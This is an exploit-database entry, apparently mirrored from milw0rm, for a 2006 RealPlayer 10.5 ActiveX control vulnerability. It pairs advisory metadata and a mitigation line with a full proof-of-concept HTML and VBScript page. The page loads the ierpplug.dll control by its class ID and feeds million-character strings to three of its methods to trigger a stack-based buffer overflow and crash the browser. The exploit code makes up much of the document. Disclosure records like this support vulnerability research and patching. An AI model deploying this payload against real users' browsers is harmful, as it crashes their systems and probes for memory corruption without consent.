RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service

vendor:

RealPlayer

by:

shinnai

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: RealPlayer

Affected Version From: 10.5

Affected Version To: 10.5

Patch Exists: YES

Related CWE: N/A

CPE: a:realnetworks:realplayer:10.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2006

RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service

RealPlayer 10.5 is prone to a denial-of-service vulnerability when a user visits a malicious web page. The vulnerability is caused due to a boundary error within the 'ierpplug.dll' ActiveX control when handling certain parameters passed to the 'GetComponentVersion', 'HandleAction' and 'DoAutoUpdateRequest' methods. This can be exploited to cause a stack-based buffer overflow by passing overly long strings to the affected methods.

Mitigation:

Upgrade to the latest version of RealPlayer 10.5

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------


<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<select style="width: 404px" name="Pucca">
  <option value = "GetComponentVersion">GetComponentVersion</option>
  <option value = "HandleAction">HandleAction</option>
  <option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="GetComponentVersion" then
     argCount   = 1
     arg1=String(1000000, "A")
     RealPlayer.GetComponentVersion arg1
   elseif Pucca.value="HandleAction" then
     argCount   = 1
     arg1=String(1000000, "A")
     RealPlayer.HandleAction arg1
   elseif Pucca.value = "DoAutoUpdateRequest" then
     argCount = 3
     arg1=1
     arg2=String(1000000, "A")
     arg3=1
     RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
   else
     MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
     "The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
     "Their tags shall blink until the end of days."
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2006-12-28]